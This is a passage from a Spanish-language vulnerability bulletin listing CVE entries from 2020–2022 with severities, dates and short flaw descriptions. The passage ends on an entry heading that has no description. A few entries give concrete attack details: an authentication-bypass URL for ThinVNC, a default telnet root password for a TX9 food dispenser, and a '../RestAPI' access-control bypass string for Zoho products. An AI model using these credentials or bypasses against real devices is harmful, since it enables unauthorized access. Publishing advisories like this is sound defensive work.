    IBM Aspera High-Speed Transfer versiones 4.3.1 y anteriores, podrían permitir a un usuario autenticado obtener información de archivos no confidenciales del sistema operativo a los que no debería tener acceso. IBM X-Force ID: 222059
  • CVE-2022-27421
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Chamilo LMS versión v1.11.13, carece de comprobación en el formulario de modificación de usuarios, permitiendo a atacantes escalar privilegios al administrador de la plataforma
  • CVE-2022-25226
    Severidad: ALTA
    Fecha de publicación: 18/04/2022
    Fecha de última actualización: 08/08/2023
    ThinVNC versión 1.0b1, permite a un usuario no autenticado omitir el proceso de autenticación por medio de "http://thin-vnc:8080/cmd?cmd=connect" al obtener un SID válido sin ningún tipo de autenticación. Es posible lograr una ejecución de código en el servidor mediante el envío de eventos de teclado o ratón al servidor
  • CVE-2022-24550
    Severidad: ALTA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Telephony Server
  • CVE-2022-20693
    Severidad: ALTA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 24/07/2023
    Una vulnerabilidad en la funcionalidad de la Interfaz de Usuario web del software Cisco IOS XE podría permitir a un atacante remoto autenticado llevar a cabo un ataque de inyección contra un dispositivo afectado. Esta vulnerabilidad es debido a que no ha sido comprobada suficientemente la entrada de datos. Un atacante podría aprovechar esta vulnerabilidad mediante el envío de entradas diseñadas a la API de la interfaz web. Una explotación con éxito podría permitir al atacante inyectar comandos al sistema operativo subyacente con privilegios root
  • CVE-2022-26816
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información en Windows DNS Server
  • CVE-2020-23705
    Severidad: MEDIA
    Fecha de publicación: 15/07/2021
    Fecha de última actualización: 17/08/2023
    Una vulnerabilidad de desbordamiento de búfer global en la función jfif_encode en el archivo jfif.c:701 de ffjpeg versiones hasta el 22-06-2020, permite a atacantes causar una Denegación de Servicio (DOS) por medio de un archivo jpeg diseñado
  • CVE-2022-26914
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Win32k
  • CVE-2022-20720
    Severidad: ALTA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 24/07/2023
    Múltiples vulnerabilidades en el entorno de alojamiento de aplicaciones Cisco IOx en varias plataformas de Cisco podrían permitir a un atacante inyectar comandos arbitrarios en el sistema operativo anfitrión subyacente, ejecutar código arbitrario en el sistema operativo anfitrión subyacente, instalar aplicaciones sin ser autenticado o conducir un ataque de tipo cross-site scripting (XSS) contra un usuario del software afectado. Para más información sobre estas vulnerabilidades, consulte la sección Details de este aviso
  • CVE-2022-28810
    Severidad: ALTA
    Fecha de publicación: 18/04/2022
    Fecha de última actualización: 08/08/2023
    Zoho ManageEngine ADSelfService Plus antes de la compilación 6122 permite a un administrador remoto autenticado ejecutar comandos arbitrarios del sistema operativo como SYSTEM a través de la función de script personalizado de la política. Debido al uso de una contraseña de administrador por defecto, los atacantes pueden ser capaces de abusar de esta funcionalidad con un esfuerzo mínimo. Además, un atacante remoto y parcialmente autenticado puede ser capaz de inyectar comandos arbitrarios en el script personalizado debido a un campo de contraseña no saneado
  • CVE-2022-20719
    Severidad: ALTA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 24/07/2023
    Múltiples vulnerabilidades en el entorno de alojamiento de aplicaciones Cisco IOx en varias plataformas de Cisco podrían permitir a un atacante inyectar comandos arbitrarios en el sistema operativo anfitrión subyacente, ejecutar código arbitrario en el sistema operativo anfitrión subyacente, instalar aplicaciones sin ser autenticado o conducir un ataque de tipo cross-site scripting (XSS) contra un usuario del software afectado. Para más información sobre estas vulnerabilidades, consulte la sección Details de este aviso
  • CVE-2022-20718
    Severidad: ALTA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 24/07/2023
    Múltiples vulnerabilidades en el entorno de alojamiento de aplicaciones Cisco IOx en varias plataformas de Cisco podrían permitir a un atacante inyectar comandos arbitrarios en el sistema operativo anfitrión subyacente, ejecutar código arbitrario en el sistema operativo anfitrión subyacente, instalar aplicaciones sin ser autenticado o conducir un ataque de tipo cross-site scripting (XSS) contra un usuario del software afectado. Para más información sobre estas vulnerabilidades, consulte la sección Details de este aviso
  • CVE-2021-26095
    Severidad: MEDIA
    Fecha de publicación: 20/07/2021
    Fecha de última actualización: 08/08/2023
    Una combinación de varios problemas criptográficos en la administración de sesiones de FortiMail versiones 6.4.0 hasta 6.4.4 y versiones 6.2.0 hasta 6.2.6, incluyéndo la construcción del cifrado de la cookie de sesión, puede permitir a un atacante remoto que ya esté en posesión de una cookie, a posiblemente revelar y alterar o falsificar su contenido, escalando así los privilegios
  • CVE-2021-36769
    Severidad: MEDIA
    Fecha de publicación: 16/07/2021
    Fecha de última actualización: 08/08/2023
    Se presenta un problema de reordenación en Telegram versiones anteriores a 7.8.1 para Android, Telegram versiones anteriores a 7.8.3 para iOS y Telegram Desktop versiones anteriores a 2.8.8. Un atacante puede causar al servidor recibir mensajes en un orden diferente al que se envió al cliente
  • CVE-2022-23345
    Severidad: MEDIA
    Fecha de publicación: 21/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que BigAnt Software BigAnt Server versión v5.6.06, contiene un control de acceso incorrecto
  • CVE-2022-26281
    Severidad: MEDIA
    Fecha de publicación: 05/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que BigAnt Server versión v5.6.06, contiene un problema de control de acceso incorrecto
  • CVE-2021-43129
    Severidad: MEDIA
    Fecha de publicación: 19/04/2022
    Fecha de última actualización: 08/08/2023
    Existe un bypass para la opción "Desactivar el clic derecho" de Desire2Learn/D2L Brightspace en la función de cuestionamiento, que permite a un participante acceder a la funcionalidad de impresión y copia a través del menú del clic derecho del navegador, incluso cuando "Desactivar el clic derecho" está activado en el cuestionario
  • CVE-2022-21475
    Severidad: MEDIA
    Fecha de publicación: 19/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en el producto Oracle Banking Payments de Oracle Financial Services Applications (componente: Infrastructure). La versión compatible que está afectada es 14.5. Una vulnerabilidad difícil de explotar permite a un atacante poco privilegiado y con acceso a la red por medio de HTTP comprometer Oracle Banking Payments. Los ataques con éxito requieren una interacción humana de una persona que no sea el atacante. Los ataques con éxito de esta vulnerabilidad pueden resultar en la creación no autorizada, el borrado o el acceso a la modificación de datos críticos o de todos los datos accesibles de Oracle Banking Payments, así como el acceso de lectura no autorizado a un subconjunto de datos accesibles de Oracle Banking Payments y la capacidad no autorizada de causar una denegación parcial de servicio (DOS parcial) de Oracle Banking Payments. CVSS 3.1, Puntuación base 5.9 (impactos en la Confidencialidad, Integridad y Disponibilidad). Vector CVSS: (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:L)
  • CVE-2021-34619
    Severidad: MEDIA
    Fecha de publicación: 21/07/2021
    Fecha de última actualización: 18/07/2023
    El plugin de WordPress WooCommerce Stock Manager es vulnerable a un ataque de tipo Cross-Site Request Forgery conllevando a una Carga de Archivos Arbitrarios en las versiones hasta 2.5.7 incluyéndola, debido a la falta de nonce y de comprobación de archivos en el archivo /woocommerce-stock-manager/trunk/admin/views/import-export.php
  • CVE-2022-27926
    Severidad: MEDIA
    Fecha de publicación: 20/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de tipo cross-site scripting (XSS) reflejado en el componente /public/launchNewWindow.jsp de Zimbra Collaboration (también se conoce como ZCS) versión 9.0, permite a atacantes no autenticados ejecutar un script web o HTML arbitrario por medio de parámetros de petición
  • Vulnerabilidad en la funcionalidad de análisis de la etiqueta del nombre de dominio de DNS en Nucleus NET, Nucleus RTOS, Nucleus Source Code y VSTAR (CVE-2020-15795)
    Severidad: MEDIA
    Fecha de publicación: 22/04/2021
    Fecha de última actualización: 08/08/2023
    Se ha identificado una vulnerabilidad en Nucleus NET (Todas las versiones anteriores a V5.2), Nucleus Source Code (Versiones que incluyen los módulos DNS afectados). La funcionalidad de análisis de etiquetas de nombres de dominio DNS no valida correctamente los nombres en las respuestas DNS. El análisis sintáctico de respuestas malformadas podría dar lugar a una escritura más allá del final de una estructura asignada. Un atacante con una posición privilegiada en la red podría aprovechar esta vulnerabilidad para ejecutar código en el contexto del proceso actual o provocar una condición de denegación de servicio
  • CVE-2021-23408
    Severidad: MEDIA
    Fecha de publicación: 21/07/2021
    Fecha de última actualización: 08/08/2023
    Esto afecta al paquete com.graphhopper:graphhopper-web-bundle versiones anteriores a 3.2, a partir de la versión 4.0-pre1 y anteriores a 4.0. Se podía engañar al analizador de URL para que añadiera o modificara propiedades de Object.prototype usando un constructor o una carga útil __proto__
  • CVE-2021-31209
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Suplantación de Identidad de Microsoft Exchange Server
  • Vulnerabilidad en Hyper-V de Microsoft (CVE-2021-28476)
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Ejecución de Código Remota de Hyper-V
  • CVE-2021-31181
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Ejecución de Código Remota de Microsoft SharePoint
  • CVE-2021-20292
    Severidad: ALTA
    Fecha de publicación: 28/05/2021
    Fecha de última actualización: 28/07/2023
    Se presenta un fallo reportado en el kernel de Linux en versiones anteriores a 5.9, en el archivo drivers/gpu/drm/nouveau/nouveau_sgdma.c en la función nouveau_sgdma_create_ttm en el subsistema Nouveau DRM. El problema es debido a una falta de comprobación de la existencia de un objeto antes de llevar a cabo operaciones en el objeto. Un atacante con una cuenta local con privilegios de root puede aprovechar esta vulnerabilidad para escalar privilegios y ejecutar código en el contexto del kernel
  • CVE-2021-37555
    Severidad: ALTA
    Fecha de publicación: 26/07/2021
    Fecha de última actualización: 08/08/2023
    Los dispositivos TX9 Automatic Food Dispenser v3.2.57, permiten acceso a un shell como root/superusuario, un problema relacionado con CVE-2019-16734. Para conectarse, el servicio telnet es usado en el puerto 23 con la contraseña predeterminada 059AnkJ para la cuenta root. El usuario puede entonces descargar el sistema de archivos mediante las utilidades preinstaladas de BusyBox (por ejemplo, tar y nc)
  • CVE-2021-37588
    Severidad: MEDIA
    Fecha de publicación: 30/07/2021
    Fecha de última actualización: 08/08/2023
    En Charm versión 0.43, dos usuarios cualesquiera pueden confabularse para conseguir la habilidad de descifrar los datos de YCT14
  • CVE-2021-37606
    Severidad: MEDIA
    Fecha de publicación: 30/07/2021
    Fecha de última actualización: 08/08/2023
    Meow hash versión 0.5/calico, no frustra suficientemente la recuperación de claves por un atacante que puede consultar si se presenta una colisión en los bits inferiores de los hashes de dos mensajes, como se ha demostrado por un ataque contra un servicio web de larga duración que permite al atacante inferir colisiones al medir las diferencias de tiempo
  • CVE-2021-37167
    Severidad: ALTA
    Fecha de publicación: 02/08/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema de permisos no seguros en el panel de control HMI3 en el Panel Swisslog Healthcare Nexus operado por versiones de software anteriores a Nexus Software 7.2.5.7. Un usuario que inicie sesión con las credenciales predeterminadas puede conseguir acceso de root al dispositivo, lo que proporciona permisos para toda la funcionalidad del dispositivo
  • CVE-2021-33330
    Severidad: MEDIA
    Fecha de publicación: 03/08/2021
    Fecha de última actualización: 08/08/2023
    Liferay Portal versiones 7.2.0 hasta 7.3.2, y Liferay DXP versiones 7.2 anteriores a fix pack 9, permite el acceso a recursos protegidos por Cross-origin resource sharing (CORS) si el usuario sólo es autenticado usando la autenticación de sesión del portal, lo que permite a atacantes remotos obtener información confidencial, incluyendo la dirección de correo electrónico del usuario objetivo y el token de tipo CSRF actual
  • CVE-2021-25370
    Severidad: MEDIA
    Fecha de publicación: 26/03/2021
    Fecha de última actualización: 08/08/2023
    Un descriptor de archivo con manejo de implementación incorrecta en el controlador dpu versiones anteriores a SMR Mar-2021 Release 1, resulta en una corrupción de memoria que conlleva a un pánico del kernel.
  • CVE-2021-26419
    Severidad: ALTA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Corrupción de la Memoria del Motor de Scripting
  • CVE-2021-28310
    Severidad: MEDIA
    Fecha de publicación: 13/04/2021
    Fecha de última actualización: 08/08/2023
    Vulnerabilidad de elevación de privilegios de Win32k. Este ID de CVE es diferente de CVE-2021-27072
  • CVE-2021-37540
    Severidad: MEDIA
    Fecha de publicación: 06/08/2021
    Fecha de última actualización: 08/08/2023
    En JetBrains Hub versiones anteriores a 2021.1.13262, era usado un CSP potencialmente insuficiente para la función de despliegue de widgets
  • Vulnerabilidad en Windows Container Manager de Microsoft (CVE-2021-31165)
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Escalada de Privilegios del servicio de Windows Container Manager Este ID de CVE es diferente de CVE-2021-31167, CVE-2021-31168, CVE-2021-31169, CVE-2021-31208
  • Vulnerabilidad en Windows Container Manager de Microsoft (CVE-2021-31167)
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Escalada de Privilegios del servicio de Windows Container Manager. Este ID de CVE es diferente de CVE-2021-31165, CVE-2021-31168, CVE-2021-31169, CVE-2021-31208
  • Vulnerabilidad en Windows Graphics Component de Microsoft (CVE-2021-31170)
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Escalada de Privilegios de Windows Graphics Component. Este ID de CVE es diferente de CVE-2021-31188
  • CVE-2021-31187
    Severidad: ALTA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Escalada de Privilegios de Windows WalletService
  • Vulnerabilidad en Windows Graphics Component de Microsoft (CVE-2021-31188)
    Severidad: BAJA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Escalada de Privilegios de Windows Graphics Component. Este ID de CVE es diferente de CVE-2021-31170
  • CVE-2021-31190
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Escalada de la Privilegios de Windows Container Isolation FS Filter Driver
  • CVE-2021-31193
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Escalada de Privilegios de Windows SSDP Service
  • Vulnerabilidad en Windows Container Manager Service de Microsoft (CVE-2021-31208)
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Escalada de Privilegios del Windows Container Manager Service. Este ID de CVE es diferente de CVE-2021-31165, CVE-2021-31167, CVE-2021-31168, CVE-2021-31169
  • CVE-2021-31979
    Severidad: ALTA
    Fecha de publicación: 14/07/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Kernel. Este ID de CVE es diferente de CVE-2021-33771, CVE-2021-34514
  • CVE-2021-33771
    Severidad: ALTA
    Fecha de publicación: 14/07/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Kernel. Este ID de CVE es diferente de CVE-2021-31979, CVE-2021-34514
  • CVE-2021-37788
    Severidad: MEDIA
    Fecha de publicación: 09/08/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en la interfaz web de Gurock TestRail versión v5.3.0.3603, podría permitir a un atacante remoto no autenticado afectar a la integridad de un dispositivo por medio de un ataque de clickjacking. La vulnerabilidad es debido a una comprobación insuficiente de entrada de datos iFrame en las peticiones HTTP que se envían a un dispositivo afectado. Un atacante podría aprovechar esta vulnerabilidad mediante el envío de paquetes HTTP diseñados con datos iFrame maliciosos. Una explotación con éxito podría permitir al atacante llevar a cabo un ataque de clickjacking donde el usuario es engañado para que haga clic en un enlace malicioso
  • CVE-2022-29527
    Severidad: MEDIA
    Fecha de publicación: 20/04/2022
    Fecha de última actualización: 08/08/2023
    Amazon AWS amazon-ssm-agent versiones anteriores a 3.1.1208.0, crea un archivo sudoers escribible en todo el mundo, lo que permite a los atacantes locales inyectar reglas Sudo y escalar privilegios a root. Esto ocurre en determinadas situaciones que implican una condición de carrera
  • CVE-2022-0354
    Severidad: ALTA
    Fecha de publicación: 22/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha informado de una vulnerabilidad en Lenovo System Update que podría permitir a un usuario local con acceso interactivo al sistema la capacidad de ejecutar código con altos privilegios sólo durante la instalación de un paquete de System Update publicado antes del 25-02-2022, que muestra una ventana de símbolo del sistema
  • CVE-2021-38878
    Severidad: MEDIA
    Fecha de publicación: 27/04/2022
    Fecha de última actualización: 08/08/2023
    IBM QRadar versiones 7.3, 7.4 y 7.5, podrían permitir a un actor malicioso hacerse pasar por otro actor debido al intercambio de claves sin autenticación de entidades. IBM X-Force ID: 208756
  • Vulnerabilidad en la implementación del protocolo Datagram TLS (DTLS) en el software Cisco Adaptive Security Appliance (ASA) y el software Cisco Firepower Threat Defense (FTD) (CVE-2022-20795)
    Severidad: MEDIA
    Fecha de publicación: 21/04/2022
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la implementación del protocolo Datagram TLS (DTLS) en el software Cisco Adaptive Security Appliance (ASA) y el software Cisco Firepower Threat Defense (FTD) podría permitir a un atacante remoto no autenticado causar un alto uso de la CPU, resultando en una condición de denegación de servicio (DoS). Esta vulnerabilidad es debido al procesamiento subóptimo que es producido cuando es establecido un túnel DTLS como parte de una conexión VPN SSL AnyConnect. Un atacante podría aprovechar esta vulnerabilidad mediante el envío de un flujo constante de tráfico DTLS diseñado a un dispositivo afectado. Una explotación con éxito podría permitir al atacante agotar los recursos del dispositivo de encabezado VPN afectado. Esto podría causar que los túneles DTLS existentes dejaran de pasar tráfico e impedir que se establecieran nuevos túneles DTLS, resultando en una condición de DoS. Nota: Cuando el tráfico de ataque es detenido, el dispositivo es recuperado con elegancia
  • CVE-2022-25866
    Severidad: ALTA
    Fecha de publicación: 25/04/2022
    Fecha de última actualización: 08/08/2023
    El paquete czproject/git-php versiones anteriores a 4.0.3, es vulnerable a una inyección de comandos por medio de una inyección de argumentos git. Cuando es llamado a la función isRemoteUrlReadable($url, array $refs = NULL), los parámetros url y refs son pasados al subcomando git ls-remote de forma que puedan establecerse flags adicionales. Los flags adicionales pueden ser usados para llevar a cabo una inyección de comandos
  • CVE-2022-27332
    Severidad: MEDIA
    Fecha de publicación: 27/04/2022
    Fecha de última actualización: 08/08/2023
    Un problema de control de acceso en Zammad versión v5.0.3, permite a atacantes escribir entradas en el registro de llamadas de CTI sin autenticación. Esta vulnerabilidad puede permitir a atacantes ejecutar ataques de phishing o causar una Denegación de Servicio (DoS)
  • CVE-2022-22315
    Severidad: MEDIA
    Fecha de publicación: 27/04/2022
    Fecha de última actualización: 08/08/2023
    IBM UrbanCode Deploy (UCD) versión 7.2.2.1, podría permitir a un usuario autenticado con permisos especiales obtener altos privilegios debido a un manejo inapropiado de permisos. IBM X-Force ID: 217955
  • CVE-2022-27336
    Severidad: ALTA
    Fecha de publicación: 27/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Seacms versión v11.6, contiene una vulnerabilidad de ejecución de código remota (RCE) por medio del componente /admin/weixin.php
  • CVE-2022-22441
    Severidad: MEDIA
    Fecha de publicación: 28/04/2022
    Fecha de última actualización: 08/08/2023
    IBM InfoSphere Information Server versión 11.7, podría permitir a un usuario autenticado visualizar información de usuarios y grupos con altos privilegios debido a una vulnerabilidad de escalada de privilegios. IBM X-Force ID: 224426
  • CVE-2021-25292
    Severidad: MEDIA
    Fecha de publicación: 19/03/2021
    Fecha de última actualización: 08/08/2023
    Se detectó un problema en Pillow versiones anteriores a 8.1.1. El analizador de PDF permite un ataque DoS (ReDoS) de expresión regular por medio de un archivo PDF diseñado debido a una regex de retroceso catastrófica
  • CVE-2022-29081
    Severidad: ALTA
    Fecha de publicación: 28/04/2022
    Fecha de última actualización: 08/08/2023
    Zoho ManageEngine Access Manager Plus versiones anteriores a 4302, Password Manager Pro versiones anteriores a 12007 y PAM360 versiones anteriores a 5401 son vulnerables a una omisión del control de acceso en algunas URL de la API Rest (para SSOutAction. SSLAction. LicenseMgr. GetProductDetails. GetDashboard. FetchEvents. y Synchronize) por medio de la subcadena ../RestAPI
  • CVE-2020-8908
    Severidad: BAJA
    Fecha de publicación: 10/12/2020
    Fecha de última actualización: 02/08/2023
    Se presenta una vulnerabilidad en la creación de directorios temporales en todas las versiones de Guava, que permite a un atacante con acceso a la máquina acceder potencialmente a los datos de un directorio temporal creado por la API de Guava com.google.common.io.Files.createTempDir(). Por defecto, en los sistemas de tipo unix, el directorio creado es legible por el mundo (legible por un atacante con acceso al sistema). El método en cuestión ha sido marcado como @Deprecated en las versiones 30.0 y posteriores y no debe ser utilizado. Para los desarrolladores de Android, recomendamos elegir una API de directorio temporal proporcionada por Android, como context.getCacheDir(). Para otros desarrolladores de Java, recomendamos migrar a la API de Java 7 java.nio.file.Files.createTempDirectory() que configura explícitamente los permisos de 700, o configurar la propiedad del sistema java.io.tmpdir del tiempo de ejecución de Java para que apunte a una ubicación cuyos permisos estén configurados adecuadamente
  • CVE-2022-29849
    Severidad: ALTA
    Fecha de publicación: 01/05/2022
    Fecha de última actualización: 08/08/2023
    En Progress OpenEdge versiones anteriores a 11.7.14 y versiones 12.x anteriores a 12.2.9, determinados binarios SUID dentro de la aplicación OpenEdge eran susceptibles de escalar privilegios. Si es explotado, un atacante local podría elevar sus privilegios y comprometer el sistema afectado
  • CVE-2022-28571
    Severidad: MEDIA
    Fecha de publicación: 02/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que D-link 882 DIR882A1_FW130B06 contiene una vulnerabilidad de inyección de comandos en "/usr/bin/cli"
  • CVE-2022-29906
    Severidad: ALTA
    Fecha de publicación: 29/04/2022
    Fecha de última actualización: 08/08/2023
    El módulo admin API en la extensión QuizGame para MediaWiki versiones hasta 1.37.2 (anteriores a 665e33a68f6fa1167df99c0aa18ed0157cdf9f66) omite una comprobación para el usuario quizadmin
  • CVE-2021-21177
    Severidad: MEDIA
    Fecha de publicación: 09/03/2021
    Fecha de última actualización: 08/08/2023
    Una aplicación de políticas insuficiente en Autofill en Google Chrome versiones anteriores a 89.0.4389.72, permitió a un atacante remoto obtener información potencialmente confidencial desde la memoria del proceso por medio de una página HTML diseñada
  • CVE-2021-36792
    Severidad: MEDIA
    Fecha de publicación: 13/08/2021
    Fecha de última actualización: 08/08/2023
    La extensión dated_news (también se conoce como Dated News) versiones hasta 5.1.1 para TYPO3, presenta un Control de Acceso incorrecto para confirmar varias aplicaciones.
  • CVE-2022-20104
    Severidad: BAJA
    Fecha de publicación: 03/05/2022
    Fecha de última actualización: 08/08/2023
    En aee daemon, se presenta una posible divulgación de información debido a un control de acceso inapropiado. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. ID del parche: ALPS06419017; ID de Incidencia: ALPS06284104
  • CVE-2022-28613
    Severidad: ALTA
    Fecha de publicación: 02/05/2022
    Fecha de última actualización: 21/07/2023
    Una vulnerabilidad en el COMPONENTE HCI Modbus TCP del firmware de la CMU de la serie RTU500 de Hitachi Energy, causada por un error de comprobación en la información de longitud que se transmite en el encabezado MBAP, permite a un ATACANTE reiniciar el dispositivo mediante el envío de un mensaje especialmente diseñado. Este problema afecta a: Hitachi Energy RTU500 series CMU Firmware versiones 12.0.*; 12.2.*; 12.4.*; 12.6.*; 12.7.*; 13.2.*
  • CVE-2021-36948
    Severidad: MEDIA
    Fecha de publicación: 12/08/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows Update Medic Service
  • CVE-2022-28067
    Severidad: MEDIA
    Fecha de publicación: 04/05/2022
    Fecha de última actualización: 08/08/2023
    Un problema de control de acceso incorrecto en Sandboxie Classic versión v5.55.13, permite a atacantes causar una denegación de servicio (DoS) en el Sandbox por medio de un ejecutable diseñado
  • CVE-2022-28096
    Severidad: MEDIA
    Fecha de publicación: 04/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Skycaiji versión v2.4, contiene una vulnerabilidad de ejecución de código remota (RCE) por medio del archivo /SkycaijiApp/admin/controller/Develop.php
  • CVE-2021-43415
    Severidad: MEDIA
    Fecha de publicación: 03/12/2021
    Fecha de última actualización: 08/08/2023
    HashiCorp Nomad y Nomad Enterprise versiones hasta 1.0.13, 1.1.7 y 1.2.0, con el controlador de tareas QEMU habilitado, permitía a usuarios autenticados con capacidad de envío de trabajos omitir las rutas de imagen permitidas configuradas. Corregido en versiones 1.0.14, 1.1.8 y 1.2.1
  • CVE-2021-34486
    Severidad: MEDIA
    Fecha de publicación: 12/08/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows Event Tracing. Este CVE ID es diferente de CVE-2021-26425, CVE-2021-34487
  • CVE-2021-43327
    Severidad: BAJA
    Fecha de publicación: 02/12/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en los dispositivos Renesas RX65 y RX65N. Con un fallo de VCC, un atacante puede extraer la clave de identificación de seguridad del dispositivo. Entonces, el firmware protegido puede ser extraído
  • CVE-2021-37041
    Severidad: MEDIA
    Fecha de publicación: 07/12/2021
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de verificación inapropiada en el Smartphone de Huawei. Una explotación con éxito de esta vulnerabilidad puede causar una lectura fuera de límites
  • CVE-2021-37042
    Severidad: MEDIA
    Fecha de publicación: 07/12/2021
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de verificación inapropiada en el Smartphone de Huawei, Una explotación con éxito de esta vulnerabilidad puede causar una lectura fuera de límites
  • CVE-2021-30589
    Severidad: MEDIA
    Fecha de publicación: 03/08/2021
    Fecha de última actualización: 08/08/2023
    Una comprobación insuficiente de las entradas no fiables en Sharing en Google Chrome anterior a versión 92.0.4515.107, permitía a un atacante remoto omitir las restricciones de navegación por medio de un enlace click-to-call diseñado
  • CVE-2021-37079
    Severidad: MEDIA
    Fecha de publicación: 07/12/2021
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de Comprobación de Entrada Inapropiada en el Smartphone de Huawei. Una explotación con éxito de esta vulnerabilidad puede conllevar a un borrado de archivos arbitrarios por el permiso system_app
  • CVE-2021-37078
    Severidad: MEDIA
    Fecha de publicación: 07/12/2021
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de Excepción No Capturada en el Smartphone de Huawei. Una explotación con éxito de esta vulnerabilidad puede conllevar a una Denegación de Servicio remota
  • CVE-2021-42757
    Severidad: MEDIA
    Fecha de publicación: 08/12/2021
    Fecha de última actualización: 08/08/2023
    Un desbordamiento de búfer [CWE-121] en la biblioteca del cliente TFTP de FortiOS versiones anteriores a 6.4.7 y FortiOS versiones 7.0.0 hasta 7.0.2, puede permitir a un atacante local autenticado lograr una ejecución de código arbitrario por medio de argumentos de línea de comandos especialmente diseñados
  • CVE-2021-37014
    Severidad: MEDIA
    Fecha de publicación: 07/12/2021
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de desbordamiento del búfer en la región Stack de la memoria en el Smartphone de Huawei. Una explotación con éxito de esta vulnerabilidad de puede conllevar a que el dispositivo no puede ser usado apropiadamente
  • CVE-2021-37020
    Severidad: MEDIA
    Fecha de publicación: 07/12/2021
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de desbordamiento del búfer en la región Stack de la memoria en el Smartphone de Huawei. Una explotación con éxito de esta vulnerabilidad puede conllevar a una lectura fuera de límites
  • CVE-2021-37021
    Severidad: MEDIA
    Fecha de publicación: 07/12/2021
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de desbordamiento del búfer en la región Stack de la memoria en el Smartphone de Huawei, Una explotación con éxito de esta vulnerabilidad puede conllevar a una lectura fuera de límites
  • CVE-2021-0417
    Severidad: MEDIA
    Fecha de publicación: 18/08/2021
    Fecha de última actualización: 08/08/2023
    En memory management driver, se presenta un posible bloqueo del sistema debido a una comprobación de entrada inapropiada. Esto podría conllevar a una denegación de servicio local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS05403499; ID del Problema: ALPS05336702.
  • CVE-2021-36190
    Severidad: MEDIA
    Fecha de publicación: 08/12/2021
    Fecha de última actualización: 08/08/2023
    Un proxy o intermediario no intencionado ("confused deputy") en Fortinet FortiWeb versión 6.4.1 y anteriores, 6.3.15 y anteriores, permite a un atacante no autenticado acceder a hosts protegidos por medio de peticiones HTTP diseñadas
  • CVE-2021-35395
    Severidad: ALTA
    Fecha de publicación: 16/08/2021
    Fecha de última actualización: 08/08/2023
